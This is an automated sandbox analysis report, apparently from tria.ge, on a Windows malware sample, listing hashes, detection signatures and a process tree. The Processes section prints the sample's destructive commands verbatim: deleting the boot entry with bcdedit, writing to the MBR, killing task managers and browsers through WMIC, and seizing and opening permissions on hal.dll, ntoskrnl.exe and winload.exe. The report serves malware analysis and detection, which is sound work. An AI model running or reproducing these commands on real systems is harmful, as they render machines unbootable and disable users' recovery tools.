Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
98s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
10/06/2023, 10:08
Static task
static1
Behavioral task
behavioral1
Sample
07443099.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
07443099.exe
Resource
win10v2004-20230220-en
General
-
Target
07443099.exe
-
Size
247KB
-
MD5
733eb0ab951ae42a8d8cca413201e428
-
SHA1
640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1
-
SHA256
52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb
-
SHA512
c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f
-
SSDEEP
3072:xaWEHnqlm+0FEaJSq6+ouCpk2mpcWJ0r+QNTBfZnazJ9k3kxMC+89+aPyXiwQ9M1:cWCMm8aMldk1cWQRNTBhz3Yz/qc9M1
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\rteth.sys cmd.exe -
Possible privilege escalation attempt 25 IoCs
pid Process 3436 takeown.exe 4564 takeown.exe 4392 icacls.exe 4672 takeown.exe 848 takeown.exe 4444 takeown.exe 3332 icacls.exe 560 icacls.exe 1216 icacls.exe 4568 icacls.exe 2644 takeown.exe 4728 takeown.exe 2004 takeown.exe 3956 takeown.exe 2600 takeown.exe 2672 icacls.exe 3240 icacls.exe 1936 icacls.exe 4112 icacls.exe 2748 takeown.exe 4616 takeown.exe 968 takeown.exe 2264 icacls.exe 3868 icacls.exe 876 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation 07443099.exe Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation winconfig.exe -
Executes dropped EXE 2 IoCs
pid Process 3964 winconfig.exe 4176 DetectKey.exe -
Modifies file permissions 1 TTPs 25 IoCs
pid Process 848 takeown.exe 4564 takeown.exe 4444 takeown.exe 4392 icacls.exe 3868 icacls.exe 1216 icacls.exe 4568 icacls.exe 3956 takeown.exe 876 icacls.exe 3436 takeown.exe 2748 takeown.exe 2672 icacls.exe 4112 icacls.exe 2600 takeown.exe 4616 takeown.exe 2004 takeown.exe 968 takeown.exe 3332 icacls.exe 2264 icacls.exe 560 icacls.exe 1936 icacls.exe 4672 takeown.exe 4728 takeown.exe 3240 icacls.exe 2644 takeown.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 2620 bcdedit.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 07443099.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1664 07443099.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2292 WMIC.exe Token: SeSecurityPrivilege 2292 WMIC.exe Token: SeTakeOwnershipPrivilege 2292 WMIC.exe Token: SeLoadDriverPrivilege 2292 WMIC.exe Token: SeSystemProfilePrivilege 2292 WMIC.exe Token: SeSystemtimePrivilege 2292 WMIC.exe Token: SeProfSingleProcessPrivilege 2292 WMIC.exe Token: SeIncBasePriorityPrivilege 2292 WMIC.exe Token: SeCreatePagefilePrivilege 2292 WMIC.exe Token: SeBackupPrivilege 2292 WMIC.exe Token: SeRestorePrivilege 2292 WMIC.exe Token: SeShutdownPrivilege 2292 WMIC.exe Token: SeDebugPrivilege 2292 WMIC.exe Token: SeSystemEnvironmentPrivilege 2292 WMIC.exe Token: SeRemoteShutdownPrivilege 2292 WMIC.exe Token: SeUndockPrivilege 2292 WMIC.exe Token: SeManageVolumePrivilege 2292 WMIC.exe Token: 33 2292 WMIC.exe Token: 34 2292 WMIC.exe Token: 35 2292 WMIC.exe Token: 36 2292 WMIC.exe Token: SeIncreaseQuotaPrivilege 2292 WMIC.exe Token: SeSecurityPrivilege 2292 WMIC.exe Token: SeTakeOwnershipPrivilege 2292 WMIC.exe Token: SeLoadDriverPrivilege 2292 WMIC.exe Token: SeSystemProfilePrivilege 2292 WMIC.exe Token: SeSystemtimePrivilege 2292 WMIC.exe Token: SeProfSingleProcessPrivilege 2292 WMIC.exe Token: SeIncBasePriorityPrivilege 2292 WMIC.exe Token: SeCreatePagefilePrivilege 2292 WMIC.exe Token: SeBackupPrivilege 2292 WMIC.exe Token: SeRestorePrivilege 2292 WMIC.exe Token: SeShutdownPrivilege 2292 WMIC.exe Token: SeDebugPrivilege 2292 WMIC.exe Token: SeSystemEnvironmentPrivilege 2292 WMIC.exe Token: SeRemoteShutdownPrivilege 2292 WMIC.exe Token: SeUndockPrivilege 2292 WMIC.exe Token: SeManageVolumePrivilege 2292 WMIC.exe Token: 33 2292 WMIC.exe Token: 34 2292 WMIC.exe Token: 35 2292 WMIC.exe Token: 36 2292 WMIC.exe Token: SeIncreaseQuotaPrivilege 4260 WMIC.exe Token: SeSecurityPrivilege 4260 WMIC.exe Token: SeTakeOwnershipPrivilege 4260 WMIC.exe Token: SeLoadDriverPrivilege 4260 WMIC.exe Token: SeSystemProfilePrivilege 4260 WMIC.exe Token: SeSystemtimePrivilege 4260 WMIC.exe Token: SeProfSingleProcessPrivilege 4260 WMIC.exe Token: SeIncBasePriorityPrivilege 4260 WMIC.exe Token: SeCreatePagefilePrivilege 4260 WMIC.exe Token: SeBackupPrivilege 4260 WMIC.exe Token: SeRestorePrivilege 4260 WMIC.exe Token: SeShutdownPrivilege 4260 WMIC.exe Token: SeDebugPrivilege 4260 WMIC.exe Token: SeSystemEnvironmentPrivilege 4260 WMIC.exe Token: SeRemoteShutdownPrivilege 4260 WMIC.exe Token: SeUndockPrivilege 4260 WMIC.exe Token: SeManageVolumePrivilege 4260 WMIC.exe Token: 33 4260 WMIC.exe Token: 34 4260 WMIC.exe Token: 35 4260 WMIC.exe Token: 36 4260 WMIC.exe Token: SeIncreaseQuotaPrivilege 4260 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1664 wrote to memory of 3964 1664 07443099.exe 84 PID 1664 wrote to memory of 3964 1664 07443099.exe 84 PID 1664 wrote to memory of 3964 1664 07443099.exe 84 PID 3964 wrote to memory of 4552 3964 winconfig.exe 85 PID 3964 wrote to memory of 4552 3964 winconfig.exe 85 PID 4552 wrote to memory of 4176 4552 cmd.exe 88 PID 4552 wrote to memory of 4176 4552 cmd.exe 88 PID 4552 wrote to memory of 4176 4552 cmd.exe 88 PID 4552 wrote to memory of 2620 4552 cmd.exe 90 PID 4552 wrote to memory of 2620 4552 cmd.exe 90 PID 4552 wrote to memory of 2292 4552 cmd.exe 91 PID 4552 wrote to memory of 2292 4552 cmd.exe 91 PID 4552 wrote to memory of 4260 4552 cmd.exe 92 PID 4552 wrote to memory of 4260 4552 cmd.exe 92 PID 4552 wrote to memory of 4444 4552 cmd.exe 93 PID 4552 wrote to memory of 4444 4552 cmd.exe 93 PID 4552 wrote to memory of 3396 4552 cmd.exe 96 PID 4552 wrote to memory of 3396 4552 cmd.exe 96 PID 4552 wrote to memory of 572 4552 cmd.exe 97 PID 4552 wrote to memory of 572 4552 cmd.exe 97 PID 4552 wrote to memory of 4392 4552 cmd.exe 98 PID 4552 wrote to memory of 4392 4552 cmd.exe 98 PID 4552 wrote to memory of 1476 4552 cmd.exe 100 PID 4552 wrote to memory of 1476 4552 cmd.exe 100 PID 4552 wrote to memory of 3224 4552 cmd.exe 101 PID 4552 wrote to memory of 3224 4552 cmd.exe 101 PID 4552 wrote to memory of 4568 4552 cmd.exe 102 PID 4552 wrote to memory of 4568 4552 cmd.exe 102 PID 4552 wrote to memory of 2192 4552 cmd.exe 103 PID 4552 wrote to memory of 2192 4552 cmd.exe 103 PID 4552 wrote to memory of 3220 4552 cmd.exe 104 PID 4552 wrote to memory of 3220 4552 cmd.exe 104 PID 4552 wrote to memory of 1080 4552 cmd.exe 105 PID 4552 wrote to memory of 1080 4552 cmd.exe 105 PID 4552 wrote to memory of 2964 4552 cmd.exe 106 PID 4552 wrote to memory of 2964 4552 cmd.exe 106 PID 4552 wrote to memory of 4040 4552 cmd.exe 107 PID 4552 wrote to memory of 4040 4552 cmd.exe 107 PID 4552 wrote to memory of 3560 4552 cmd.exe 108 PID 4552 wrote to memory of 3560 4552 cmd.exe 108 PID 4552 wrote to memory of 2284 4552 cmd.exe 109 PID 4552 wrote to memory of 2284 4552 cmd.exe 109 PID 4552 wrote to memory of 4636 4552 cmd.exe 110 PID 4552 wrote to memory of 4636 4552 cmd.exe 110 PID 4552 wrote to memory of 3904 4552 cmd.exe 111 PID 4552 wrote to memory of 3904 4552 cmd.exe 111 PID 4552 wrote to memory of 2904 4552 cmd.exe 113 PID 4552 wrote to memory of 2904 4552 cmd.exe 113 PID 4552 wrote to memory of 2308 4552 cmd.exe 114 PID 4552 wrote to memory of 2308 4552 cmd.exe 114 PID 4552 wrote to memory of 4120 4552 cmd.exe 115 PID 4552 wrote to memory of 4120 4552 cmd.exe 115 PID 4552 wrote to memory of 3864 4552 cmd.exe 116 PID 4552 wrote to memory of 3864 4552 cmd.exe 116 PID 4552 wrote to memory of 2248 4552 cmd.exe 117 PID 4552 wrote to memory of 2248 4552 cmd.exe 117 PID 4552 wrote to memory of 3648 4552 cmd.exe 118 PID 4552 wrote to memory of 3648 4552 cmd.exe 118 PID 4552 wrote to memory of 5012 4552 cmd.exe 119 PID 4552 wrote to memory of 5012 4552 cmd.exe 119 PID 4552 wrote to memory of 2496 4552 cmd.exe 120 PID 4552 wrote to memory of 2496 4552 cmd.exe 120 PID 4552 wrote to memory of 5084 4552 cmd.exe 121 PID 4552 wrote to memory of 5084 4552 cmd.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\07443099.exe"C:\Users\Admin\AppData\Local\Temp\07443099.exe"1⤵
- Checks computer location settings
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\Temp\winconfig.exe"C:\Windows\Temp\winconfig.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AE8.tmp\2AE9.tmp\2AEA.bat C:\Windows\Temp\winconfig.exe"3⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Users\Admin\AppData\Roaming\DetectKey.exe"C:\Users\Admin\AppData\Roaming\DetectKey.exe"4⤵
- Executes dropped EXE
PID:4176
-
-
C:\Windows\system32\bcdedit.exebcdedit /delete {current}4⤵
- Modifies boot configuration data using bcdedit
PID:2620
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='mmc.exe' delete /nointeractive4⤵PID:4444
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='PartAssist.exe' delete /nointeractive4⤵PID:3396
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='control.exe' delete /nointeractive4⤵PID:572
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:4392
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager.exe' delete /nointeractive4⤵PID:1476
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='Security Task Manager Protable.exe' delete /nointeractive4⤵PID:3224
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='CCleaner.exe' delete /nointeractive4⤵PID:4568
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp.exe' delete /nointeractive4⤵PID:2192
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64.exe' delete /nointeractive4⤵PID:3220
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='procexp64a.exe' delete /nointeractive4⤵PID:1080
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:2964
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='regedit.exe' delete /nointeractive4⤵PID:4040
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='iexplore.exe' delete /nointeractive4⤵PID:3560
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='chrome.exe' delete /nointeractive4⤵PID:2284
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='firefox.exe' delete /nointeractive4⤵PID:4636
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='opera.exe' delete /nointeractive4⤵PID:3904
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='edge.exe' delete /nointeractive4⤵PID:2904
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='msedge.exe' delete /nointeractive4⤵PID:2308
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='brave.exe' delete /nointeractive4⤵PID:4120
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='wmplayer.exe' delete /nointeractive4⤵PID:3864
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad.exe' delete /nointeractive4⤵PID:2248
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='notepad++.exe' delete /nointeractive4⤵PID:3648
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:5012
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:2496
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:5084
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:2124
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskmgr.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2644
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\hal.dll"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3956
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\winload.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2600
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\ntoskrnl.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:848
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\perfmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3436
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\resmon.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4564
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4728
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\taskkill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4672
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tasklist.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4616
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\tskill.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2748
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\logonui.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2004
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Process Hacker 2"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:968
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\drivers"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4444
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:100
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:320
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:3068
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:4496
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3332
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2264
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\winload.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2672
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4392
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3868
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3240
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:560
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1216
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1936
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4568
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:876
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4112
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='taskmgr.exe' delete /nointeractive4⤵PID:1232
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='perfmon.exe' delete /nointeractive4⤵PID:4220
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='logonui.exe' delete /nointeractive4⤵PID:4280
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name='ProcessHacker.exe' delete /nointeractive4⤵PID:4436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2492
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F4⤵PID:4020
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\hal.dll" /grant "everyone":F4⤵PID:1876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3272
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F4⤵PID:4120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2656
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F4⤵PID:2148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4644
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\logonui.exe" /grant "everyone":F4⤵PID:4132
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4156
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\resmon.exe" /grant "everyone":F4⤵PID:2112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4592
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F4⤵PID:5076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:660
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F4⤵PID:5088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4388
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\system32\tskill.exe" /grant "everyone":F4⤵PID:1616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1224
-
-
C:\Windows\system32\cacls.execacls "C:\Program Files\Process Hacker 2" /grant "everyone":F4⤵PID:2256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3316
-
-
C:\Windows\system32\cacls.execacls "C:\Windows\System32\drivers" /grant "everyone":F4⤵PID:4084
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a645734f3bf4a2682cbaf546789ec0c4
SHA1fafcc11909412bf51f217e12dfaa93a15181a3e2
SHA2563b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0
SHA512efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
87KB
MD5aba9a3cf4e1db4602c25405987b809a6
SHA16cd545ea023ce9cdfe76607c6801cc11ff7d9e80
SHA256490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6
SHA512e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b
-
Filesize
139KB
MD511d457ee914f72a436fa4a8a8f8446dd
SHA1d0308ca82ed9716b667e8e77e9ae013b9af44116
SHA256c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef
SHA5124c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b